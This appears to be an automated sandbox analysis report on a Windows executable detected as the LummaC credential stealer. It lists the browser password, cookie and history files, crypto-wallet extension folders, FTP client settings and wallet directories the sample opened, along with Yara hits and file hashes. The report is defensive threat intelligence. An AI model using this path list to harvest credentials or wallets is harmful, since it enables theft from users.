Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000003.1597829853.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1597724019.00000000014E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Windows Analysis Report
0zBsv1tnt4.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1580958
Product:	CloudBasic
Start time:	14:13:18
Start date:	26.12.2024
Sample:	0zBsv1tnt4.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	27e0a573048fadb3dd4b3b2454c8eda5
SHA1:	c841c7fd14f4982e37aed56b25c0d748902fa9e2
SHA256:	6d6884e9912854c20c4dea409280402b3e27a0448407ad7f37c3fb642ee60525
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	00EBD1C61E9D4B9D279E5C9D78E294AE	B3D6522A46B02CB7B25D826B478AC3F51B8C527E	A31E43D760D9920DD415849BBE752D72CC931EE07130A3344831D622476FBCC8
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	C28D286DADA723EA979F44AFAEDB7309	D1CACC6405F510749C10A8EF8CF1D90A712BC966	5E2FD7A09F6F8856C44F23011B046680F76EE5AA1383AEC4A6C13B1246BE7575
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	B58AF33A034354F0F053789CB47087A9	784E826C9C0096E51F7F7AE47FA0DC99712097FD	48FF101F7BF3C9C7B2298585B7AE07770706B78CCE42B9A1253ACD6A27F8B1A3
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	46EDD8589A4D1FBECFB2A36F7E18DBD3	EB870FA6440DD7103D1C16D43D5B059786A09D2F	EBA76E20C9FB8B681869DC1ED4DE394C4855D81D2C677EE91EC7EF8E77CB6DB0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	E422919D322DD12910621D9C1C860B45	A64ED25FCB3BD59278829D73CB6556C4F4084999	07698EC76001D986FB15DF78209BDBD4F39CE44405CC98D1EAEC4862CB12BE07
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 26 12:15:01 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	D996F6AA3B8B40577D641FDC22F7C9DD	9B2644073AFC1A7589F61E0628700D8D32C9773E	1D3A77513B2C907C63496A86CAA0D7A0542B130CD6C17A7B402CC83D3D64E9B5
Chrome Cache Entry: 100	exported SGML document, ASCII text, with very long lines (65536), with no line terminators	2E00D51C98DBB338E81054F240E1DEB2	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
Chrome Cache Entry: 101	ASCII text, with very long lines (46884)	F57E274AE8E8889C7516D3E53E3EB026	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
